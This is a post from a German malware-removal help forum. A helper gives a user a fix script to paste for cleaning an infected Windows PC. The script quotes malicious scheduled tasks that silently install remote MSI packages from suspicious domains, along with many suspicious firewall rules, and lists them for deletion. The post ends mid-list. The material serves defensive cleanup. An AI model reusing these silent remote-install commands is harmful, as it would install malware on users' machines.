Trojaner-Board - Windows\SysWOW64\setup.exe -> CPU-Last

:hallo:

Mein Name ist Matthias und ich werde dir bei der Analyse und der eventuell notwendigen Bereinigung deines Computers helfen.

Bitte vergewissere dich zuerst, dass du die folgenden Regeln und Hinweise für eine Analyse inklusive Bereinigung gelesen und verstanden hast:
Für alle Hilfesuchenden! Was muss ich vor der Eröffnung eines Themas beachten?

Schritt 1

Kopiere den gesamten Inhalt der folgenden Code-Box:

Code:

Start:: CustomCLSID: HKU\S-1-5-21-2537196151-4261474988-3807526252-1001_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6} -> [OneDrive] => {a52bba46-e9e1-435f-b3d9-28daa648c0f6} CustomCLSID: HKU\S-1-5-21-2537196151-4261474988-3807526252-1001_Classes\CLSID\{1BF42E4C-4AF4-4CFD-A1A0-CF2960B8F63E}\InprocServer32 -> C:\Users\User\AppData\Local\Microsoft\OneDrive\18.044.0301.0006\amd64\FileSyncShell64.dll => Keine Datei CustomCLSID: HKU\S-1-5-21-2537196151-4261474988-3807526252-1001_Classes\CLSID\{7AFDFDDB-F914-11E4-8377-6C3BE50D980C}\InprocServer32 -> C:\Users\User\AppData\Local\Microsoft\OneDrive\18.044.0301.0006\amd64\FileSyncShell64.dll => Keine Datei CustomCLSID: HKU\S-1-5-21-2537196151-4261474988-3807526252-1001_Classes\CLSID\{82CA8DE3-01AD-4CEA-9D75-BE4C51810A9E}\InprocServer32 -> C:\Users\User\AppData\Local\Microsoft\OneDrive\18.044.0301.0006\amd64\FileSyncShell64.dll => Keine Datei ShellIconOverlayIdentifiers: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => -> Keine Datei ShellIconOverlayIdentifiers: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} => -> Keine Datei ShellIconOverlayIdentifiers: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} => -> Keine Datei ShellIconOverlayIdentifiers: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => -> Keine Datei ShellIconOverlayIdentifiers: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => -> Keine Datei ShellIconOverlayIdentifiers: [ OneDrive6] -> {9AA2F32D-362A-42D9-9328-24A483E2CCC3} => -> Keine Datei ShellIconOverlayIdentifiers: [ OneDrive7] -> {C5FF006E-2AE9-408C-B85B-2DFDD5449D9C} => -> Keine Datei ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Keine Datei ShellIconOverlayIdentifiers-x32: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => -> Keine Datei ShellIconOverlayIdentifiers-x32: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} => -> Keine Datei ShellIconOverlayIdentifiers-x32: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} => -> Keine Datei ShellIconOverlayIdentifiers-x32: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => -> Keine Datei ShellIconOverlayIdentifiers-x32: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => -> Keine Datei ShellIconOverlayIdentifiers-x32: [ OneDrive6] -> {9AA2F32D-362A-42D9-9328-24A483E2CCC3} => -> Keine Datei ShellIconOverlayIdentifiers-x32: [ OneDrive7] -> {C5FF006E-2AE9-408C-B85B-2DFDD5449D9C} => -> Keine Datei ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => -> Keine Datei Task: {34BEBE0B-28EF-4C41-B80B-77EB024B4CFD} - kein Dateipfad Task: {455831B0-04EA-4D51-9A33-B61555CB47FB} - System32\Tasks\ikujelamnie => "msiexec" -package hxxps://superdomain1709.info/opmireraabbxut.rov /q <==== ACHTUNG Task: {66BC8A73-75F7-43F3-B355-A48C3632ED31} - System32\Tasks\ovlygkmnsiq => "msiexec" /q -package hxxps://superdomain1709.info/ehiydafvpq.hok <==== ACHTUNG Task: {833C7BF2-E615-4EC3-9E65-E89B1B304C34} - System32\Tasks\Avast Software\Overseer => C:\Program Files\Common Files\Avast Software\Overseer\overseer.exe (AVAST Software s.r.o. -> AVAST Software) C:\Program Files\Common Files\Avast Software Task: {96F4D31A-AEE3-42FD-B505-EFA5491DB080} - System32\Tasks\{59DA57C1-8435-158F-DF1A-AE6858D6E74C} => "msiexec" /package hxxps://refreshnerer711.info/ed0dqm8x.FAL -q <==== ACHTUNG Task: {AAE22D62-B9D7-450D-B8F9-8B99817EFB16} - \Microsoft\Windows\UNP\RunCampaignManager -> Keine Datei <==== ACHTUNG Task: {C72FCD97-F3F5-4CA1-84B9-C1D0625890F7} - System32\Tasks\{8BCF4701-8D32-47B7-87EC-468C0950EB02} => "c:\program files (x86)\google\chrome\application\chrome.exe" hxxp://ui.skype.com/ui/0/7.8.0.102/de/abandoninstall?source=lightinstaller&page=tsInstall Task: {D573C633-A96F-4584-BCE0-2270A1FB81BC} - System32\Tasks\DriverMaxAgent => C:\Program Files (x86)\Innovative Solutions\DriverMax\drivermax.exe C:\Program Files (x86)\Innovative Solutions Task: {FE5AFCE1-5209-49E6-B1F1-2CE677B1EA9E} - System32\Tasks\{7BBA84D2-5B4E-36CE-48B3-D11A36A979FF} => "msiexec" /i hxxps://refreshnerer711rb.info/C2sTdP8DW.yMb /q <==== ACHTUNG FirewallRules: [{CB8F896F-3255-45F8-B256-E29D55752C57}] => (Allow) C:\Program Files\AVAST Software\Avast\AvEmUpdate.exe Keine Datei FirewallRules: [{44AB29E2-A7C2-4A86-875A-8FF4404E41A2}] => (Allow) C:\Program Files\AVAST Software\Avast\AvEmUpdate.exe Keine Datei FirewallRules: [UDP Query User{375D6481-A159-452E-93F1-07FD0F8578CC}C:\program files\openshot video editor\launch.exe] => (Allow) C:\program files\openshot video editor\launch.exe Keine Datei FirewallRules: [TCP Query User{5BF6E9D2-422F-4921-A59B-0BCF996A4587}C:\program files\openshot video editor\launch.exe] => (Allow) C:\program files\openshot video editor\launch.exe Keine Datei FirewallRules: [UDP Query User{FCB6F407-659F-4846-ACA2-FD6ECEAEC109}C:\program files (x86)\easeus\easeus todo pctrans\bin\pctrans.exe] => (Allow) C:\program files (x86)\easeus\easeus todo pctrans\bin\pctrans.exe Keine Datei FirewallRules: [TCP Query User{9DE8A35E-1B55-4AE4-9E37-97EFF516478B}C:\program files (x86)\easeus\easeus todo pctrans\bin\pctrans.exe] => (Allow) C:\program files (x86)\easeus\easeus todo pctrans\bin\pctrans.exe Keine Datei FirewallRules: [UDP Query User{898F9A30-5176-4D39-A430-F22464A82139}C:\users\user\appdata\local\amazon music\amazon music helper.exe] => (Allow) C:\users\user\appdata\local\amazon music\amazon music helper.exe (Amazon Services LLC -> Amazon Services LLC) FirewallRules: [TCP Query User{526CA1CE-36A6-47EE-AF24-7E745007A801}C:\users\user\appdata\local\amazon music\amazon music helper.exe] => (Allow) C:\users\user\appdata\local\amazon music\amazon music helper.exe (Amazon Services LLC -> Amazon Services LLC) FirewallRules: [{0F3BD764-593E-445D-A09D-C0F329AB5959}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation) FirewallRules: [{118B9424-01A7-4A08-A14C-B2C208A8A71E}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation) FirewallRules: [{21710E99-6B92-4A4D-B52C-0465243096EC}] => (Allow) C:\Windows\twain_32\Samsung\SLC460\ScanCDLM\ScanCDLM.exe (Samsung Electronics CO., LTD. -> ) FirewallRules: [{76F6FEFD-D51D-4C5B-9785-4F93735FBB48}] => (Allow) C:\Windows\twain_32\Samsung\SLC460\ScanCDLM\ScanCDLM.exe (Samsung Electronics CO., LTD. -> ) FirewallRules: [{D218C6FF-3898-41F9-B58D-A2F0F923B6A5}] => (Allow) C:\Program Files (x86)\Samsung\Easy Document Creator\EDC.exe (Samsung Electronics CO., LTD. -> ) FirewallRules: [{4CA136C0-64E2-4331-80E3-ED19204F18C4}] => (Allow) C:\Program Files (x86)\Samsung\Easy Document Creator\EDC.exe (Samsung Electronics CO., LTD. -> ) FirewallRules: [{35004A42-1342-49DD-A3A9-51BE0651139A}] => (Allow) C:\Program Files\Common Files\Common Desktop Agent\CDASrv.exe (Samsung Electronics CO., LTD. -> ) FirewallRules: [{41A1CE18-85FD-44FB-97CD-E19DA06E105A}] => (Allow) C:\Program Files\Common Files\Common Desktop Agent\CDASrv.exe (Samsung Electronics CO., LTD. -> ) FirewallRules: [{B7F31089-E065-4A19-94DE-C0E679D67CD7}] => (Allow) C:\Program Files (x86)\Samsung\Easy Printer Manager\IDS.Application.exe (Samsung Electronics CO., LTD. -> Samsung Electronics Co., Ltd.) FirewallRules: [{B504B6A4-A2A1-4C53-AD19-85EAE77D9DC2}] => (Allow) C:\Program Files (x86)\Samsung\Easy Printer Manager\OrderSupplies.exe (Samsung Electronics CO., LTD. -> Samsung Electronics Co., Ltd.) FirewallRules: [{4649E051-5F17-459C-9341-94461971AEB4}] => (Allow) C:\Program Files (x86)\Samsung\Easy Printer Manager\IDSAlert.exe (Samsung Electronics CO., LTD. -> Samsung Electronics Co., Ltd.) FirewallRules: [{E207F8A6-BDD0-48FC-9489-54A272FA58DE}] => (Allow) C:\Program Files (x86)\Samsung\Easy Printer Manager\uninstall.exe (Samsung Electronics Co., Ltd.) [Datei ist nicht signiert] FirewallRules: [{FFD1D817-9B28-4492-94E1-0952823FCED8}] => (Allow) C:\Program Files (x86)\Samsung\Easy Printer Manager\CDAS2PC\CDAS2PC.exe (Samsung Electronics CO., LTD. -> Samsung Electronics Co., Ltd.) FirewallRules: [{9E92F77A-E0F0-4117-BF12-7067355D1684}] => (Allow) C:\Program Files (x86)\Samsung\Easy Printer Manager\CDAS2PC\ScanProcess.exe (Samsung Electronics CO., LTD. -> ScanProcess) FirewallRules: [{B930B682-270A-4F8B-8975-87291276D47B}] => (Allow) C:\Program Files (x86)\Samsung\Easy Printer Manager\CDAS2PC\Scan2PCNotify.exe (Samsung Electronics CO., LTD. -> Scan2PCNotify) FirewallRules: [TCP Query User{0A899D8A-988B-48D6-AC4D-EB47C0526048}C:\users\user\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\user\appdata\roaming\spotify\spotify.exe Keine Datei FirewallRules: [UDP Query User{AAE9483D-CE60-4E9D-9DE2-80EA012125F9}C:\users\user\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\user\appdata\roaming\spotify\spotify.exe Keine Datei FirewallRules: [TCP Query User{552F8FD3-1F6E-4105-9EC3-B55FC63709ED}C:\program files (x86)\keepvid\keepvid music\downloadres\urlreqservice.exe] => (Block) C:\program files (x86)\keepvid\keepvid music\downloadres\urlreqservice.exe (Wondershare software CO., LIMITED -> Wondershare) FirewallRules: [UDP Query User{D4560AB5-F6EF-4023-A9EA-CC64E8376BAD}C:\program files (x86)\keepvid\keepvid music\downloadres\urlreqservice.exe] => (Block) C:\program files (x86)\keepvid\keepvid music\downloadres\urlreqservice.exe (Wondershare software CO., LIMITED -> Wondershare) FirewallRules: [TCP Query User{8F671184-4A86-4834-B9A8-15A6AAF65EF5}C:\users\user\appdata\roaming\spotify\spotify.exe] => (Block) C:\users\user\appdata\roaming\spotify\spotify.exe Keine Datei FirewallRules: [UDP Query User{A7B44418-E18D-4D01-83E9-83F81652F29F}C:\users\user\appdata\roaming\spotify\spotify.exe] => (Block) C:\users\user\appdata\roaming\spotify\spotify.exe Keine Datei FirewallRules: [{63B49F0F-0046-4AEF-A6E6-8C2E940FAF80}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC -> Google Inc.) FirewallRules: [{951ED701-C925-4423-84C2-5E0ED939887B}] => (Allow) C:\WINDOWS\SysWOW64\msiexec.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{04AB3B26-80ED-4287-AD9A-EBC696A6FE23}] => (Allow) C:\Users\User\LegEoyOX.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{247CB039-80FB-4081-AD98-8DC64C16F22D}] => (Allow) C:\Users\User\AppData\Local\EULhyy.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{C06916C1-E920-4DDA-9F4E-1674A453FF5B}] => (Allow) C:\WINDOWS\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{3C50DE56-1466-424C-B07C-08722E920088}] => (Allow) C:\WINDOWS\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{6D84E6FD-9B5C-4F26-A5C9-E36263E228CE}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe Keine Datei FirewallRules: [{749C0C14-A3C4-4FA7-AC4F-913D31AC76F2}] => (Allow) C:\WINDOWS\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{19043619-22A3-47DD-9DE4-54465B74CD89}] => (Allow) C:\WINDOWS\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{AD8AE28C-A908-41DF-A769-539CFCB48EFB}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe Keine Datei FirewallRules: [{E2285CC3-5176-4493-98EA-E855A068AC1E}] => (Allow) C:\WINDOWS\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{6A96B843-BEB8-4CC8-AB57-EE32ACBAD1E2}] => (Allow) C:\WINDOWS\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{73DDEE3D-13DD-4CB2-8E1F-7A5D61BDC75A}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe Keine Datei FirewallRules: [{CA6C14D6-8DDD-4534-AEE8-5A332038A7AE}] => (Allow) C:\WINDOWS\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{DAEA83DF-9BDD-48B8-B2CD-0FFDEA15EDF1}] => (Allow) C:\WINDOWS\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{A8F27671-A93C-4CCE-99A8-3DBD872642D7}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe Keine Datei FirewallRules: [{0579CBC8-E145-4E09-B691-4783DE7A62B6}] => (Allow) C:\WINDOWS\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{0E157875-ED49-49E0-9235-41358F16BE93}] => (Allow) C:\WINDOWS\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{A6297EE5-0762-4343-8AFF-9A4AAEF4AF93}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe Keine Datei FirewallRules: [{83ECF9C0-7158-45FC-85CA-5C8EF7D77B5D}] => (Allow) C:\WINDOWS\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{F94DA623-4449-4C60-95E5-87C7E4E06D3C}] => (Allow) C:\WINDOWS\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{581E90B2-ECAC-4E75-8BCC-BB43DFBFD793}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe Keine Datei FirewallRules: [{4B82B734-6D59-4832-AE4B-74C71892E20B}] => (Allow) C:\WINDOWS\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{6530D013-1A5A-47A5-B8A6-50EE9B2B61BE}] => (Allow) C:\WINDOWS\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{FD153938-CAE7-4607-BFDE-EC9DE60D5F74}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe Keine Datei FirewallRules: [{98D05644-FBD7-4661-A378-778BF49179FF}] => (Allow) C:\WINDOWS\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{2F8483F3-868F-4809-8634-8753CCD931A0}] => (Allow) C:\WINDOWS\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{4BE1F4A2-554C-4C9D-97AA-AEBE3A3A257B}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe Keine Datei FirewallRules: [{AC8C4CB3-9277-48C6-95B5-5172F9E189F7}] => (Allow) C:\WINDOWS\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{7F62CBE1-DB29-4C7B-8839-F1573EEFCA40}] => (Allow) C:\WINDOWS\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{455A46D4-886A-4004-9C28-EFDFCAA17A66}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe Keine Datei FirewallRules: [{48384756-4DFD-432C-83BF-745F19517BED}] => (Allow) C:\WINDOWS\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{EFE3167D-E472-4851-B73F-2D8DCCB9F886}] => (Allow) C:\WINDOWS\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{8EED4D84-F02F-415C-B268-112488513C5D}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe Keine Datei FirewallRules: [{06605301-B3E6-4841-88AC-EFCBAC665989}] => (Allow) C:\WINDOWS\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{7E1641F0-9967-415F-A314-BBF015C5B796}] => (Allow) C:\WINDOWS\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{7AE9CB55-086E-4386-977F-453FB9B2A409}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe Keine Datei FirewallRules: [{832BB23E-1588-480A-86A3-0C278F7697ED}] => (Allow) C:\WINDOWS\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{D080BF1A-7AE6-468C-BFBE-C95F95628B91}] => (Allow) C:\WINDOWS\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{31AB33CD-3952-47EE-B4ED-5EAC584CD5FC}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\x32\setup.exe (Ghisler Software GmbH -> ) FirewallRules: [{16373234-C025-4596-9AB6-87EC9E0F03B1}] => (Allow) C:\WINDOWS\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{CF386085-205F-443F-8279-9DE3545CD9B9}] => (Allow) C:\WINDOWS\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{ECE04D62-DC05-4A2C-9911-1ECA8C128C12}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\x32\setup.exe (Ghisler Software GmbH -> ) FirewallRules: [{9886BA9C-915E-47B0-A7D9-126A7B3A8052}] => (Allow) C:\WINDOWS\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{A0202AD0-94CE-4E64-B7A3-83BBBA6C9397}] => (Allow) C:\WINDOWS\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{7F91949D-92EE-40AB-B9B2-4A4EEA2FFC08}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\x32\setup.exe (Ghisler Software GmbH -> ) FirewallRules: [{ECC7BAA9-9317-4444-B54B-E67A865F0BA9}] => (Allow) C:\WINDOWS\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{9F4F6C23-3066-4F60-BF09-A93D1AAEA838}] => (Allow) C:\WINDOWS\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{DCBE6D48-24E3-4E81-BEAF-AF0244142969}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\x32\setup.exe (Ghisler Software GmbH -> ) FirewallRules: [{84B90E74-EFA6-4E7B-8E0F-8121212088D3}] => (Allow) C:\WINDOWS\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{56BD1BEA-572C-4A73-BE9C-40A258558751}] => (Allow) C:\WINDOWS\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{D9B051AB-62E5-470A-A342-B7C4F21E7A80}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\x32\setup.exe (Ghisler Software GmbH -> ) FirewallRules: [{85D62200-ECC3-4D12-B449-2D6896F2651F}] => (Allow) C:\WINDOWS\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{AA05FFCF-1839-4860-A16F-BBB94C9B15FB}] => (Allow) C:\WINDOWS\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{2FA7075D-A673-4D34-8AC8-97D4A4F54585}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\x32\setup.exe (Ghisler Software GmbH -> ) FirewallRules: [{CB9E1510-48E2-436F-B02B-756ABF5C13AE}] => (Allow) C:\WINDOWS\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{57EC68CD-892B-4C0E-804C-55204AC12698}] => (Allow) C:\WINDOWS\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{293080AE-2184-4965-BB6C-8571762C973C}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\x32\setup.exe (Ghisler Software GmbH -> ) FirewallRules: [{8E728695-388D-43C0-96DE-B0EDCE157A95}] => (Allow) C:\WINDOWS\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{2974C6EC-07D3-46F0-A44F-848B220DE03D}] => (Allow) C:\WINDOWS\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{0574687D-3EE3-4456-B943-6BCAB08F2750}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\x32\setup.exe (Ghisler Software GmbH -> ) FirewallRules: [{7A101F0C-27B1-4E1E-AEDD-CF6AE02A8384}] => (Allow) C:\WINDOWS\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{D4EAC782-466B-410B-89B8-9425B47EC9A8}] => (Allow) C:\WINDOWS\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{9B364669-6CE9-4FEB-BE07-A8BDB713F3B9}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\x32\setup.exe (Ghisler Software GmbH -> ) FirewallRules: [{31498530-5C98-41C2-90CC-0E6FAF9A87D7}] => (Allow) C:\WINDOWS\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{EEF25935-6FE1-44D3-A5A8-CD016C5CE1F1}] => (Allow) C:\WINDOWS\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{621CEFD1-2ADB-4389-BAC3-79B01C759ADF}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\x32\setup.exe (Ghisler Software GmbH -> ) FirewallRules: [{BCADE952-5BC8-4F86-882D-AB13D1677D36}] => (Allow) C:\WINDOWS\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{5BCEDD59-3BD9-4BD7-95FB-F33DC20FDF39}] => (Allow) C:\WINDOWS\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{0E54325C-256F-46CC-B1B6-75651751077C}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\x32\setup.exe (Ghisler Software GmbH -> ) FirewallRules: [{80D04C15-F3F2-4216-92D4-4985F662E4ED}] => (Allow) C:\WINDOWS\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{74930783-10BB-44AC-9E11-593B73A28844}] => (Allow) C:\WINDOWS\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{AABDF72B-32CB-4962-8BF8-3B1866893DAB}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\x32\setup.exe (Ghisler Software GmbH -> ) FirewallRules: [{A32578E7-69B3-4BF6-BACD-B9B5151E034D}] => (Allow) C:\WINDOWS\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{8045D2E2-8F54-4F9E-99ED-341800929205}] => (Allow) C:\WINDOWS\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{E233DD74-276B-4744-BC4C-9ADDC42CB9BF}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\x32\setup.exe (Ghisler Software GmbH -> ) FirewallRules: [{17F73863-0101-4ADA-ADE7-602C76F9A8B2}] => (Allow) C:\WINDOWS\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{DFEC4A3A-EEC6-4435-B964-2AF04261BB61}] => (Allow) C:\WINDOWS\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{0C75609C-FFC5-4B0D-8076-B9BA39DE0A5A}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\x32\setup.exe (Ghisler Software GmbH -> ) FirewallRules: [{004D6ED1-2144-48FC-82F8-9A32B59F884B}] => (Allow) C:\WINDOWS\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{8FFB553C-0114-4A17-8EA9-8C8878AF74FC}] => (Allow) C:\WINDOWS\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{C0859AAA-D7B3-410F-A6F6-84412E630EBB}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\x32\setup.exe (Ghisler Software GmbH -> ) FirewallRules: [{5EBAF0E7-E596-4809-ACDE-FECBDA75311F}] => (Allow) C:\WINDOWS\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{AECFBCF5-8FAC-4535-9BF2-21E5AAE4F549}] => (Allow) C:\WINDOWS\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{FEE062A6-AA2D-45C2-8200-181DF94F65F2}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\x32\setup.exe (Ghisler Software GmbH -> ) FirewallRules: [{5B7E94C6-8241-4CE2-B965-82285DB5279C}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation) FirewallRules: [{20441145-C7E5-4B00-BB37-41F600BB3BDB}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation) FirewallRules: [{A077C64A-223B-4575-8DE1-557777E75533}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\x32\setup.exe (Ghisler Software GmbH -> ) FirewallRules: [{B53527AF-AEFA-48CD-B45A-DAD0C07CAF6E}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation) FirewallRules: [{CC21DF73-4ABA-4968-9B92-456D1B74B3AF}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation) FirewallRules: [{6986044F-A168-4E3F-A4D1-F9D542FA06CB}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\x32\setup.exe (Ghisler Software GmbH -> ) FirewallRules: [{D9F635F5-BEB4-4651-A8DB-88C3156C4B72}] => (Allow) C:\WINDOWS\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{28065C12-CCB1-4978-8CCE-FD3FF815F516}] => (Allow) C:\WINDOWS\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{113A58BB-1D4A-4DD6-B747-9C1553A2498B}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\x32\setup.exe (Ghisler Software GmbH -> ) GroupPolicy: Beschränkung - Chrome <==== ACHTUNG GroupPolicy\User: Beschränkung ? <==== ACHTUNG CHR HKLM\SOFTWARE\Policies\Google: Beschränkung <==== ACHTUNG HKU\S-1-5-21-2537196151-4261474988-3807526252-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://de.yahoo.com/?fr=fp-comodo&type=33090001005_11.0.0.6802_i_hp_sp SearchScopes: HKU\S-1-5-21-2537196151-4261474988-3807526252-1001 -> DefaultScope {0AA24E16-07B3-4694-8357-3C21ACC5F516} URL = hxxps://de.search.yahoo.com/yhs/search?hspart=comodo&hsimp=yhs-com_chrome&type=33090001005_11.0.0.6802_i_ds_sp&p={searchTerms} SearchScopes: HKU\S-1-5-21-2537196151-4261474988-3807526252-1001 -> {0AA24E16-07B3-4694-8357-3C21ACC5F516} URL = hxxps://de.search.yahoo.com/yhs/search?hspart=comodo&hsimp=yhs-com_chrome&type=33090001005_11.0.0.6802_i_ds_sp&p={searchTerms} SearchScopes: HKU\S-1-5-21-2537196151-4261474988-3807526252-1001 -> {FFEBBF0A-C22C-4172-89FF-45215A135AC7} URL = Handler: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\PROGRA~2\mcafee\SITEAD~1\mcieplg.dll Keine Datei FF Homepage: Mozilla\Firefox\Profiles\7vfacfnw.default -> hxxps://de.yahoo.com/?fr=fp-comodo&type=33090001004_11.0.0.6802_i_hp_sp FF Extension: (Kein Name) - C:\Program Files (x86)\McAfee\SiteAdvisor\e10ssaffplg.xpi [nicht gefunden] FF SearchPlugin: 